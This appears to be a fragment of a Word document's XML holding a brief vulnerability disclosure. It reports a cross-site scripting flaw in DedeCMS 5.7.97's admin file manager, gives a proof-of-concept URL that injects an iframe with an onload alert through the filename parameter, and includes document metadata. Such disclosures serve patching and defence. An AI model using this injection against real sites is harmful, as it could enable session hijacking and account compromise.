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XSS Attack in DedeCMS 5.7.97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Affected version: V 5.7.97 (with the latest patch installed) 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Authenticated user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the following url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bookmarkStart w:id="0" w:name="OLE_LINK1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"http://localhost/dede/dede/file_manage_view.php?fmdo=edit&amp;filename=%3E%22%3E%20%3Ciframe%20src=1%20onload=alert(1)%3E"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http://localhost/dede/dede/file_manage_view.php?fmdo=edit&amp;filename=%3E%22%3E%20%3Ciframe%20src=1%20onload=alert(1)%3E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/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XSS pops up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26003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B9CFD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="387B9CFD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6CEE02D3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6CEE02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yMDY2NjMwOGI0NmQwZjU2N2Q0YmViYWJiOTJlZmMifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="31DF1710"/>
    <w:rsid w:val="3B62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242</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>19</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>262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2022-12-26T02:48:36Z</dcterms:created>
  <dc:creator>chandler</dc:creator>
  <cp:lastModifiedBy>KOI</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-26T03:08:34Z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B8D1AB88FFDE4123B1D4CEF7C9ECCD2F</vt:lpwstr>
  </property>
</Properties>
</file>